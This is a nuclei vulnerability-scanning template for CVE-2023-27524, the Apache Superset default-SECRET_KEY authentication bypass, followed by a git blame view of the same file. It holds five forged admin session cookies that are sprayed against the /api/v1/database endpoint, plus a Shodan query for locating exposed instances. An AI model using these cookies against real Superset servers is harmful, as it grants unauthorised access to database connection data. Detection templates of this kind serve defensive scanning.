nuclei-templates/http/cves/2023/CVE-2023-27524.yaml

id: CVE-2023-27524

info:
  name: Apache Superset - Authentication Bypass
  author: DhiyaneshDK,_0xf4n9x_
  severity: high
  description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
  reference:
    - https://github.com/horizon3ai/CVE-2023-27524
    - https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27524
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
    cvss-score: 8.9
    cve-id: CVE-2023-27524
    cwe-id: CWE-1188
  metadata:
    max-request: 45
    verified: true
    shodan-query: html:"Apache Superset"
  tags: cve,cve2023,apache,superset,auth-bypass

http:
  - raw:
      - |
        GET /api/v1/database/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: session={{session}}

    payloads:
      path:
        - '1'
        - '2'
        - '3'
        - '4'
        - '5'
        - '6'
        - '7'
        - '9'
        - '10'

      session:
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.RoFeMf1WLNJXDYslf18x9VGxC0Q'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hKV8XXVcD6lWhTIoWs0CjrSRPQQ'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.xtJXBhmJ0k6_oKs8iGhWJK2BjKs'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hRZP41FgqxjaxjJ3WyeIVxyZDng'
        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.6GpaUB9IP9OnG3HHon3XcdzHWhI'
    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"database_name":'
          - '"configuration_method":'
        condition: and

      - type: status
        status:
          - 200
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`id: CVE-2023-27524`

			`info:`
updated matcher 2023-04-26 02:45:47 +00:00			`name: Apache Superset - Authentication Bypass`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`author: DhiyaneshDK,_0xf4n9x_`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`severity: high`
			`description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.`
			`reference:`
			`- https://github.com/horizon3ai/CVE-2023-27524`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`- https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-27524`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L`
			`cvss-score: 8.9`
			`cve-id: CVE-2023-27524`
			`cwe-id: CWE-1188`
			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 45`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`shodan-query: html:"Apache Superset"`
			`tags: cve,cve2023,apache,superset,auth-bypass`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`- raw:`
			`- \|`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`GET /api/v1/database/{{path}} HTTP/1.1`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`Host: {{Hostname}}`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`Cookie: session={{session}}`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`payloads:`
trail space fix 2023-04-26 11:57:03 +00:00			`path:`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`- '1'`
			`- '2'`
			`- '3'`
			`- '4'`
			`- '5'`
			`- '6'`
			`- '7'`
			`- '9'`
			`- '10'`
trail space fix 2023-04-26 11:57:03 +00:00
			`session:`
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.RoFeMf1WLNJXDYslf18x9VGxC0Q'`
			`- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hKV8XXVcD6lWhTIoWs0CjrSRPQQ'`
			`- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.xtJXBhmJ0k6_oKs8iGhWJK2BjKs'`
			`- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hRZP41FgqxjaxjJ3WyeIVxyZDng'`
			`- 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.6GpaUB9IP9OnG3HHon3XcdzHWhI'`
			`attack: clusterbomb`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00
Updated CVE-2023-27524 Template 2023-04-26 09:03:59 +00:00			`stop-at-first-match: true`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '"database_name":'`
updated matcher 2023-04-26 02:45:47 +00:00			`- '"configuration_method":'`
			`condition: and`
Create CVE-2023-27524.yaml 2023-04-25 13:32:59 +00:00
			`- type: status`
			`status:`
			`- 200`